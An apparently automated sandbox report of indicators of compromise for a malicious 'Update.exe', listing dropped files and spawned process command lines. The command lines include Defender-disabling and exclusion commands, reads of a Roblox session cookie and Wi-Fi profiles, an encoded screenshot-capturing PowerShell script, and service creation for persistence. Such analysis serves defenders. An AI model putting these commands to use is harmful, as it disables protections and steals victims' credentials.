IOC Report
Update.exe

loading gif

Files

File Path
Type
Category
Malicious
Update.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\Build.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\libssl-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\rarreg.key
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Windows\Temp\jxokwqntprmq.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\ ?? ?? \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\RES8576.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Mon Sep 9 06:07:02 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\_MEI68522\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI68522\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI68522\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI68522\bound.blank
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_025xchzj.1yp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hlrlury.aob.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1fuprbfx.s1n.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ri3bsk2.dqt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1tocp5wi.spm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20ysg5xx.exv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34w2frg5.sp2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ryuu3g3.asp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzwljs2.kal.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3ejxeyf.hdj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a53tnpzv.rdj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epkgjt0u.0rf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2mof1dx.lax.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fza2jgeq.5oo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkdldkmv.v04.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu0yzwqb.qhi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdo2thbc.uaq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogkk0u3w.d1d.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p35bqvam.v3j.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quuqklrz.xdn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxwothsz.k2i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk2xvtmo.3it.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakzazjh.kgj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufv0qwrl.2bk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xi1amh.mxr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhugdfo2.bfj.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj4n50bu.sgi.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xikwqogl.sm2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.out
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
modified
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Windows\Temp\__PSScriptPolicyTest_1oo3oavh.1nn.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_eifcxopy.csd.ps1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_i0ujtrnw.4fd.psm1
ASCII text, with no line terminators
dropped
C:\Windows\Temp\__PSScriptPolicyTest_jinvyoo5.hud.ps1
ASCII text, with no line terminators
dropped
There are 58 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Update.exe
"C:\Users\user\Desktop\Update.exe"
malicious
C:\Users\user\Desktop\Update.exe
"C:\Users\user\Desktop\Update.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
malicious
C:\Users\user\AppData\Local\Temp\bound.exe
bound.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
malicious
C:\Users\user\AppData\Local\Temp\Build.exe
"C:\Users\user\AppData\Local\Temp\Build.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe
"C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop bits
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe delete "JLDYOGXF"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe create "JLDYOGXF" binpath= "C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe" start= "auto"
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe start "JLDYOGXF"
malicious
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
C:\ProgramData\bmqxekewprir\nfblozsybbjy.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
malicious
C:\Windows\System32\sc.exe
C:\Windows\system32\sc.exe stop bits
